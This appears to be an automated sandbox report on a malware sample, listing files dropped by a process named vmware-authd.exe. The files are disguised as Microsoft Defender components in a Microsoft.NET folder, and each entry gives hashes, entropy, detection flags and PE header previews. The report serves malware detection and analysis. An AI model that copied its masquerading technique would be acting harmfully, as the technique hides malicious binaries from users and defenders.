Preview:	// ClientWMIUninstall.mof : ..//..// Copyright (c) Microsoft Corporation. All rights reserved...//..// This file will be processed by MOFCOMP utility to..// install Microsoft Security Client classes to the WMI repository..//....#pragma autorecover....#pragma namespace("\\\\.\\root\\Microsoft")....instance of __Namespace..{.. Name = "SecurityClient" ;..};....#pragma namespace ("\\\\.\\root\\Microsoft\\SecurityClient")....class Win32_ProviderEx : __Win32Provider..{.. [.. Description("Hosting Model, provides compatibility with Windows XP and Windows Server .NET. Do not override."),.. Override("HostingModel").. ].. string HostingModel = "LocalServiceHost";.. .. [.. Description("..."),.. Override("SecurityDescriptor").. ] .. string SecurityDescriptor; .. .. UInt32 version = 1;..};......[.. abstract: ToInstance, .. Description("This is a base abstract class that might be serialized to XML"): ToInstance ToSubClass..]..class Seria

C:\Program Files (x86)\Microsoft.NET\ConfigSecurityPolicy.exe

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	296280
Entropy (8bit):	6.091659225748971
Encrypted:	false
SSDEEP:	6144:0WEUBaI5gV/c/JjDX8lv/FJlo3zMfPoL4qpBW/7DZe/pS:1VoVkhjDXS/rK4qpAFe0
MD5:	828221391F701B2CD7D1BF772A5B369E
SHA1:	E3C6679E9AA43B0A92841E36B4B2352599AA3437
SHA-256:	545F9356969C1D50E6FA0DEF359900F84553A7FDA29EDC55693CDE8B399E52BB
SHA-512:	988F7FA7A802A97C63D4AFA0D71434666179A7B73EA778332F4A77201551129F23B3C214526FA296C8B6BD688325044AFC734929E1AA94E4E58C79976F7FB14F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: WKYC506_2389030007-00901003007010_777380775_#U00b2.exe, Detection: malicious, Browse Filename: WKYC506_2389030007-00901003007010_777380775_#U00b2.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........G..@...@...@.......@...C...@...D...@...E...@...A...@...A.E.@...H...@.......@...B...@.Rich..@.........................PE..d.....)..........."............................@.............................`......%-....`.......... ..........................................0.... ...#......X)...`..X%...P..\.......T.......................(...P...@............................................text............................... ..`.rdata..\|...........................@..@.data...@?.......@..................@....pdata..X).......0..................@..@.rsrc....#... ...0... ..............@..@.reloc..\....P.......P..............@..B........................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\DefenderCSP.dll

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	328976
Entropy (8bit):	6.198120164117354
Encrypted:	false
SSDEEP:	6144:xNnWg5R+apw+X7RUi7ugdjklyi7mjSaO8xm6j2n:rWg5R+apw+X7iSJdjklyi7mjSt8Vjm
MD5:	86C84739AE8836EDADC2631B7D59F29B
SHA1:	0370932E18368A169C1A84A3F86A305016BA6AF0
SHA-256:	7AF5A25F7991926C507FA1DDC56639E0242FCB4CBD1E4667EE660E52FE824BA6
SHA-512:	ABC7E228A1A2C2C48025F40544CF4C79FB044864DB760146886A08234F3212FFE14B7E3E3B5094FC1036444C5E9D5C3C4F28DA1B7D80822A1931BC65ED221773
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: WKYC506_2389030007-00901003007010_777380775_#U00b2.exe, Detection: malicious, Browse Filename: WKYC506_2389030007-00901003007010_777380775_#U00b2.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2&..SH..SH..SH.g&I..SH.g&K..SH..+...SH.;!I..SH..SI.dRH.;!L..SH.;!K..SH.;!M.&SH.g&H..SH.g&A.SH.g&...SH.g&J..SH.Rich.SH.................PE..d......i.........." .....P...........................................................0....`A........................................`^..p....^..................8(.......%..............p......................(.......8............................................text....H.......P.................. ..`.rdata..R....`.......`..............@..@.data....0...p... ...p..............@....pdata..8(.......0..................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\EppManifest.dll

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1070440
Entropy (8bit):	5.101220702530903
Encrypted:	false
SSDEEP:	6144:JmiTVVmVVV8VVNVVVcVVVxVVVPVVlVVVRVVVtVVWV60jVLVVOVVUVZVVVVVjVVJZ:L/6qa37LS
MD5:	DD23543F34BBF0FB213A9B94EEAD88C6
SHA1:	0D86ACF88053E92C148246DBEC2ED57C5873D103
SHA-256:	11E886100FCCE403D98866CDF32A9DE5FE010DFC092B17B0A05D2598C6822CF8
SHA-512:	D87B4D7F309F2B0F6FE16803B32BCD6FD053482C705194AB0A93AB341232052AE35DEA60B34166ADB3E81F7E11685FA890AF3F8EB14C14D5159E2C30DD017E0B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: WKYC506_2389030007-00901003007010_777380775_#U00b2.exe, Detection: malicious, Browse Filename: WKYC506_2389030007-00901003007010_777380775_#U00b2.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..d.....E.........." ......... ...............................................0......*.....`.......................................................... ...............0..h%..............T............................................................................rdata..............................@..@.rsrc........ ....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\FepUnregister.mof

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	C source, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	361
Entropy (8bit):	4.8940836129092675
Encrypted:	false
SSDEEP:	6:j2Lx3wlgQ/B93BXVN+RytwqjOq5ceB0FVAnorAIeRKpLasaT2E/xoOEkyoMy:j2Lx3wlzBJBFN+RZqjOq5XB0GBb9RHxn
MD5:	CCE6F066104177A368EE528EBF94A170
SHA1:	25D90A5CC14763FC932A819A1120931C146E0F11
SHA-256:	58996425ADD2DFC63157CBD618ABB81C722FADCF5E2133D2488DB2840DBF47D5
SHA-512:	1E3314C5B974D97821AD5CBBC6B2D1529B598D9AD34F10AE61FEAA66625DE6ABC2267E579C59F5B1331A387EE036539C99B7256EF3A24964F5CE748D2C4D98A0
Malicious:	false
Preview:	// FepUnregister.mof : mof source for namespace unregisteration..//..// Copyright (c) Microsoft Corporation. All rights reserved...//..// This file will be processed by MOFCOMP utility to..// unregister the provider with the WMI repository..//....#pragma namespace("\\\\.\\root\\Microsoft")..#pragma deleteinstance("__Namespace.Name='SecurityClient'", nofail)..

C:\Program Files (x86)\Microsoft.NET\MpAsDesc.dll

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	210272
Entropy (8bit):	5.230229920969571
Encrypted:	false
SSDEEP:	6144:HmiTVVmVVV8VVNVVVcVVVxVVVPVVlVVVRVVVtVVWV60jVLVVOVVUVZVVVVVjVVJQ:FOd
MD5:	566A2EA0F4DE26A845FCB86E2E1FBBDC
SHA1:	7F09E0AE96C7B6FA922EB44957AFEA88A061C765
SHA-256:	424AABA98E59CD79F308FAC5D598D165B54006A75B24ECFA0D764B825CFC3565
SHA-512:	06B480F472F933DA67FBC92F845DF4E2070D57033D4052FD4277606550D2FB1782D35784419624CCF3EE2EE69586B5C8FFA535A35DF1057C377D6FD813DFCE15
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..d...T............." .................................................................h....`.......................................................... ..................`%..............T............................................................................rdata..............................@..@.rsrc........ ....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\MpAzSubmit.dll

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1418512
Entropy (8bit):	6.2264061869732945
Encrypted:	false
SSDEEP:	24576:8oTyorjq8Iyuxo1Ejy4xdUzhuVStq5QYOPO0Yee55eOh1yLtVcVceu5r:8oTyore8Iy4AEjy4xdUzySC5OPOFee56
MD5:	D6D75D933B8FADA9C4016428EE8266F7
SHA1:	2E69B04D7320C590C7E4F8810F5CE5F51A7C3E2F
SHA-256:	7E2D151DB066EDFD958472D5F9B13113BEE2759306A568CA42A1FF0A3E3F4911
SHA-512:	410C487FCFF08C7052BFF30EB1CCE78DA4EDD1B3584F2A58173CA7A9B682F6BB528CFD0736F658D061F951326B609A178DD2F8C25016957EEF15A398471B34DA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n)..H.TH.TH.T.=.U+H.T.:.U9H.TH.T.I.T.:.U9H.T.:.U.H.T.:.U.H.T.:XT(H.T.=.U+H.T.=.U.H.T.=ZT+H.T.=.U+H.TRich*H.T................PE..d.... ............" .....`... .................f.....................................s....`A.........................................r.......r.......P.......P..8........%...`...,...{..p.......................(.......8............................................text...hP.......`.................. ..`.rdata.......p... ...p..............@..@.data..............................@....pdata..8....P.......@..............@..@.rsrc........P.......@..............@..@.reloc...,...`...0...P..............@..B................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\MpClient.dll

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	29348169
Entropy (8bit):	0.2214206095219058
Encrypted:	false
SSDEEP:	12288:STEVz+CYxqHWYgeWYg955/155/5QbEthFzh+14A2orV:bVzBYxqBEZzh+14z
MD5:	2CF15600CA36A7697EA6F1C23AD0053A
SHA1:	5B1F29E5306F88557435CF784A0FF0084BEC4AC3
SHA-256:	FE611430867855596108EA9CE12EED8BD57E31614B6FBED99E7DAE3282A7CECD
SHA-512:	D5FFF6D4B6980D61FAFA36E38401825D84B8347D6043EA2E23349B70C63DBCE6EEA1B86645A0AB6C0DD21657B13A6911D1E771B6B401369ED25A3AEF1C037E95
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 12%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r..j6.l96.l96.l9".h8%.l9".o8:.l9".i8..l9V.h88.l9V.o8<.l9V.i8e.l9".m8;.l96.m9..l9R.i8..l9R.o84.l9R.e84.l9R.l87.l9R..97.l9R.n87.l9Rich6.l9........PE..d...R..e.........." ... .................................................................`.........................................`....=..d................`...A..............d...`...p.......................(... ...@............................................text............................... ..`.rdata..8Q.......R..................@..@.data....Y..........................@....pdata...A...`...B..................@..@_RDATA..\............R..............@..@.rsrc................T..............@..@.reloc..d............V..............@..B........................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\MpCmdRun.dll

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	30653561
Entropy (8bit):	1.3212424996171093
Encrypted:	false
SSDEEP:	49152:JHi8Mhu4zmPWHRiQcdvhMVjXHElIST54VEQ57npmPEa8yTdRAGQB:1i8ZrdviVjc3pRAGQB
MD5:	155FC22D12D6B20CF1856B8F6E77B86C
SHA1:	9C235E021EC845CE48221310237BEACF843AE06F
SHA-256:	A490CE88399C63A00D5CED252C2BF9FE95C59DDD05E75ECBF8F4A0E05E561FB3
SHA-512:	37E3D5B93076045304C8C5D925DDC4A9C9DC4311811A144A2091FE7C442D1E041E49AB7618CFA21902923B590BD52CEFBCF879C3AD15F5AAAE6056F9CAAB41DF
Malicious:	true
Antivirus:	Antivirus: Virustotal, Detection: 3%, Browse
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d......e.........." .....,<.........@Z;.......@..............................PJ...................................... ................B......pB..S...pI.......F.LS............C.......................................................B.......B......................text... *<......,<................. ..`.data....[...@<..\...0<.............@....bss.... .....A..........................idata...S...pB..T....A.............@....didata.......B.......A.............@....edata........B.......A.............@..@.rdata..D.....B.......A.............@..@.reloc........C.......A.............@..B.pdata..LS....F..T....D.............@..@.rsrc........pI......JH.............@..@.............PJ...... I.............@..@........................................

C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	925848
Entropy (8bit):	6.085579436536139
Encrypted:	false
SSDEEP:	12288:kI8/UlbzMwl5E5tbcklE1WcHTWYmj8rzm/xsdO/05e7+ew7l:kIkwMPEgcHS/j8ruxsdO2FJ
MD5:	4F2C9892C74315AD23E03A84FC3C15CD
SHA1:	8F1B56DE4487610611442B91052B165AC25ACDF8
SHA-256:	09C6A18F0DEF6FB156DFF6F8EF3EAC3F27A23BE141338E21EADDA093B84AB0F2
SHA-512:	B245243360C900AAA7A47CC3AC06BF56617A9C5BBB83F9BE62C547E6A4C97DF23E677F9A7B0CADC21D3D1F82E24738D54BE1604E77F453F6FC9A4CE46B811431
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........;c..Z...Z...Z..a/...Z..a/...Z..=(...Z..=(...Z..."...Z..=(...Z..=(...Z...Z...X..a/..RZ...s..Z..a/..Z..a/...Z..Rich.Z..................PE..d....P.j.........."......p...p.......b.........@..................................................... ......................................0....................T.......@......l.......p.......................(.......8..................X... ....................text....l.......p.................. ..`.rdata..n...........................@..@.data....R...@...P...@..............@....pdata...T.......`..................@..@.didat.. ...........................@....rsrc...............................@..@.reloc..l...........................@..B................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\MpCommu.dll

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	353552
Entropy (8bit):	6.063609490596869
Encrypted:	false
SSDEEP:	6144:tdIqN/NLP6m0KBU19MCIOD6zhhsP1nhUOqM:wi/OXGhYrqM
MD5:	5C77DC919514E716498065E898A24030
SHA1:	2EF9CFF55BE5F8DF08CDD735773130EDBF6FF071
SHA-256:	69BBFE4113FAD42B74A4039EDAC0C8BEA7C558DD22C1D7A284163EFC190FDC95
SHA-512:	06D9C9AF52411DAAE72DDD9628A867F15E24F856507A54D3E3B6CDE7775BE6CB0663CF78CAD82CE1E4AC5542CE2EF4CAB88A4D770A3BEA774780543E8A6825C4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M......................................................o.........Q......%...............R...................Rich....................PE..d...c............." ...........................f.............................P.......P....`A................................................p........0..........\|,...@...%...@..........p...................(...(......8...........P................................text............................... ..`.rdata........... ..................@..@.data....#....... ..................@....pdata..\|,.......0..................@..@.didat..X.... ......................@....rsrc........0....... ..............@..@.reloc.......@.......0..............@..B................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\MpCopyAccelerator.exe

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	165560
Entropy (8bit):	5.404976368456962
Encrypted:	false
SSDEEP:	1536:UMrr7HamDZjuGzV+J0fG9uKPxONFKTeWvOCzAt1di5ku1RQpy55Pxx:NKiZyGzEKoANFKTeAzAD85ku1S85r
MD5:	BF16294ABC456381F5F8C8BA7CA68933
SHA1:	762B74924FAACA7CE2DFA1DA78E5076D4FF7CF62
SHA-256:	1241F24AC9C5A111F21C5CEF831A5881A5C06229E09D158CBF2AC54E41C4E1C9
SHA-512:	3110E14522BE93B5C9B6193B29B36553A3CE81192BFC33DEA0617768873A8F23BA33260FECE074E38BF82723EEE246F1000BE61A9FDCF8A5C0A09FF08C9F47CB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9.B.X...X...X..q-...X..q-...X..-...X..-...X... t..X..-...X..-...X...X...Y..q-...X..q-...X..q-...X..Rich.X..................PE..d.....h..........."..........P.................@.............................`......FZ............... .......................................Z..................`....`...&...P..4....9..p.......................(.......8...........8................................text...e........................... ..`.rdata...].......`..................@..@.data........p.......p..............@....pdata..`...........................@..@.rsrc...............................@..@.reloc..4....P.......P..............@..B................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\MpDetours.dll

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	165136
Entropy (8bit):	5.919968753776253
Encrypted:	false
SSDEEP:	3072:SbKF9Ch4oIM5qO2j+1L4BitdPhPIBcV0YnoC4PlS/KB8cV2j6jaV4:S+nCZIM1Ld7hgjWoXYcV7z
MD5:	F05E8D6365BF5A5218071548F5E687A0
SHA1:	B132FE303519E4BE50A547D6A6FE8AF359C8D335
SHA-256:	657A136378B351C50C2D60D425210021C8FE0BB9E8B998320163CC09339899AC
SHA-512:	B09B0FE1693F2B726B56CE745EF949CDE3A0D2412D763F3F84FEBAD3C4D28A0FDB6ED40CA55EFB0D8AEB5EF410402F42229F06583EC9B1572D477029141B7FFF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;..............~....o....s....x..v.z.p.....L....V.....~.....6......~.....~..Rich...........................PE..d......0.........." .........................................................p......&.....`A.........................................................P.......0.......`...%...`......@...p.......................(...`...8............................................text...Bw.......................... ..`.rdata..............................@..@.data...............................@....pdata.......0... ... ..............@..@.rsrc........P.......@..............@..@.reloc.......`.......P..............@..B........................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\MpDetoursCopyAccelerator.dll

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	103672
Entropy (8bit):	5.463582216147117
Encrypted:	false
SSDEEP:	1536:9QyB1n0kg+iFMx3/TOw987XxhLTdCfDQl/0agrW7mPfp5PRnNazo:pn0k8FM5/TOw27XTdCfDW8nNPfp5pNa8
MD5:	5B57B2C8291FE382F8F87E91A19B5BB9
SHA1:	0B4224F7DA53BF49A1A822DA111464B185657A8A
SHA-256:	48732B6B8C62DAEA68F2C38EEDEEA59DA2F142403AF9EE0D8D77181BDD22BBD1
SHA-512:	4E2012B7C19319A97F4AAA7C94DD7427C850B30EAD8E679F8140AF60724AEACDFA943BA9501D456F66DB08E2325772B90F2F8E5502AB63909F5F4BED97FEC8BF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z.f.>...>...>.....?......4......2......9...7...1...>...0............?...........?.....?...Rich>...........PE..d...R.L..........." .................^....................................................`A........................................0...H...x........`..`....P.......p...$...p..........p...................h...(...0...8...............0............................text............................... ..`.rdata..*W.......`..................@..@.data........0.......0..............@....pdata.......P.......@..............@..@.rsrc...`....`.......P..............@..@.reloc.......p.......`..............@..B........................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\MpDlpCmd.exe

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	373224
Entropy (8bit):	5.820010710818714
Encrypted:	false
SSDEEP:	6144:zbkK5UHrNrsedr+z0nsqBmiTVVmVVV8VVNVVVcVVVxVVVPVVlVVVRVVVtVVWV60R:eNgGr+Wjl
MD5:	9CA81B59C17591C8B09AF4D753A28020
SHA1:	95D7494686DFA1701FEF297944EBA28B06380931
SHA-256:	98EFF3DF7B16B9743B4F5A89F163406946E8C42229DEFCEB77E26BB5B2FF307A
SHA-512:	C782A8C01B12CBCDB77D49224D04D386E0EC68F66789C9970370CC68BDD0270ADAE8D3DE52AFF821189BC1BA96231FA283489854E3AF7D67ADEB4BDE3FA52D8D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D...%...%...%..cP...%..cP...%..?W...%..?W...%...]...%..?W...%..?Wn..%..?W...%...%...$..cP...%..cPl..%..cP...%..Rich.%..........................PE..d....3\|s.........."..................9.........@.....................................}............... ......................................4...@....p.......P..H........1......l...P...p.......................(...`...8...............h............................text...E........................... ..`.rdata...}..........................@..@.data........0.......0..............@....pdata..H....P... ...@..............@..@.rsrc........p.......`..............@..@.reloc..l............p..............@..B................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\MpEvMsg.dll

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	144728
Entropy (8bit):	3.894814306787259
Encrypted:	false
SSDEEP:	768:w81RWuK37OeBkG22Tumo0cTH6QKqCmuKqrWmNKq4mZKqdmjd4KqgmXRrL1PemM9t:wssBkG2usKfPeFz
MD5:	E49B09EAC7BD3C5B71B0F33E72A2CF34
SHA1:	61F5B81BF0C81090098806B2EF3C8EF895504AD9
SHA-256:	E9C233A28F49690339710143FDC146FAA9B73E89A8D828CC026F7246C5CED71E
SHA-512:	2E75983DD7FE9FFB73A5CCE89A6A0C19489A4ADBAC0D6B68AB53B08CF12D3D9BE7FC139E8C7B9CCD37FF07B5B24E7D9CAEDAFACFCBE3CC3351C504AA8AE564A3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..d................." ......................................................................`.......................................................... ..................X%..............T............................................................................rdata..............................@..@.rsrc........ ....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\MpOAV.dll

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	496912
Entropy (8bit):	6.014056505362478
Encrypted:	false
SSDEEP:	6144:UTmg/KSnLsE0aGPrR4IcdwSbttHRqJULrf6KmiTVVmVVV8VVNVVVcVVVxVVVPVVQ:UxSrR4Ic7bttxqJULrTj
MD5:	82D45EE8BCA40389EA79879C75EC6207
SHA1:	86108949630649367EA91153EEE86F2FDC9F2489
SHA-256:	CE0B09D43134DD41BA555AAF18DD491EC610DD503864CAF7BFFF60AFB73F8ED5
SHA-512:	8E03CC2B53635BBA4D3AB21946C20D91B8387BE0FDEF700A893104AD5153CAF2632A1D51766DEBCA6A05C35F15B40F08A20EE52FD154938D930406C0A8F354EE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......EA.G. ... ... ...U... ...R... ... ..-!...R... ...R... ...R... ...U... ...U..M ...U/.. ...U... ..Rich. ..................PE..d..............." ..........................._....................................\|.....`A................................................D...x............`...#...p...%......t.......p....................8..(...P7..8............8..p............................text...2........................... ..`.rdata..............................@..@.data....0... ... ... ..............@....pdata...#...`...0...@..............@..@.rsrc................p..............@..@.reloc..t............`..............@..B........................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\MpProvider.dll

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	202072
Entropy (8bit):	5.957890458465426
Encrypted:	false
SSDEEP:	3072:H/5F5VF0f8aKwRRw9XOfCAbP+A+TQ3KTeWxFYapr7Du2pe:H/5Fp0fThRRw9+fCAldmFYMpe
MD5:	4987F9EFD8B2E414801BB322400D2BFD
SHA1:	A1AAA1743D7927D667EDC74A36B1A8EFF5FE2470
SHA-256:	08789F41E50D75EADBDF097494D9AD66B26FED684501E99B5E219CA7FDE0489D
SHA-512:	FFDCEE1706AE0E02D8E79D3775EEF40E86B331CE186EEB0BB897ACF70AB85260C2AED15DBAA3AD93161A159202D1004A149A30573D5CC83AE249A3DEE17C4CBF
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k.:...i...i...i.r.h...i.r.h...i...i#..i.r.h...i.r.h...i.r.h...i.r.h...i.rAi...i.r.h...iRich...i........................PE..d...-.T..........." ......... ......@.....................................................`A.........................................u......Hv..,.......@...............X%......p....+..p.......................(.......@...........(................................text...l........................... ..`.rdata..&...........................@..@.data... ...........................@....pdata........... ..................@..@.rsrc...@...........................@..@.reloc..p...........................@..B........................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\MpRtp.dll

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1619192
Entropy (8bit):	6.3400930707756755
Encrypted:	false
SSDEEP:	24576:uLLxAt3sZG5yM+SrnrwrTqfb8BPVEGAUFSCJMb1ierG:ko8ZGk8nEqfoBPqdUFrMb1ieq
MD5:	59CD6F03A00980D8ADBF42EFBB9FFFD8
SHA1:	F5471A156DDDC69799782E3FE0D72FD6E8D0F085
SHA-256:	A6D588A8EC27E9294C52BA9ABE5DD1FC7C99E129B7CAF9C19F39FF6ECA236B0A
SHA-512:	49D69D9C19342985B0E520868F7745A4B515EF2EC5778372E266978A9FE690BC3BEF37CB0CA2B513D829B82D92A4D04C8143B594ABF83A3082B86324EE6B0A8E
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......P(c..I...I...I..<...I..<...I...;...I...I...H...;...I...;..=I...;...I...;...I..<...I..<...I..<...I..<...I..Rich.I..................PE..d....(~..........." .................3.........^..........................................`A........................................@............... ..hg...`..,........$..............p...................P\|..(....G..8...........x\|..........@....................text............................... ..`.rdata..>.... ....... ..............@..@.data....v.......`..................@....pdata..,....`.......@..............@..@.didat..x...........................@....rsrc...hg... ...p..................@..@.reloc........... ...p..............@..B................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\MpSvc.dll

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	3282192
Entropy (8bit):	6.315630312982859
Encrypted:	false
SSDEEP:	98304:rGo+pTlHiqauRMwGM2CEwCaCEaC3CE8CYPpCGnCqCEPCBCEPCjY:rGo+pTlHiqP/G7Y
MD5:	3767B51F5D134FD6A459F2F30C87ED14
SHA1:	33DEC014E1CB9A3B6BF4F3D037935C3E7E39904A
SHA-256:	203E41C2321D802387381D4F003EA49884A0CA0BF61ADF7D103992B0D529932C
SHA-512:	7E5AE6E6BC9E5E9A70E5A1C3B37707EDB6CE62266B59AD452E2A2F27008BA0F51661E46095130DBD04CA62C7E10F087B51F6D41FDA04CB19D0A806FE2D4A581B
Malicious:	true
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......U.....zE..zE..zE..{D..zE..yD..zE..{D..zE..~D..zE..yD..zE...E..zE..{EL.zE...D!.zE..E..zE..zD..zE..sDe.zE6y.E..zE..E..zE..xD..zERich..zE........................PE..d.....;..........." ......$....................\.............................02.......2...`A...........................................d...T...\|....`1.......0.<D....1..%....1.\6...r*.p.....................%.(.....$.8...........@.%..............................text...nu$.......$................. ..`.rdata...X....$..`....$.............@..@.data...............................@....pdata..<D....0..P..../.............@..@.didat.......P1.......1.............@....rsrc........`1...... 1.............@..@.reloc..\6....1..@....1.............@..B........................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\MsMpCom.dll

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	107880
Entropy (8bit):	5.399183517403788
Encrypted:	false
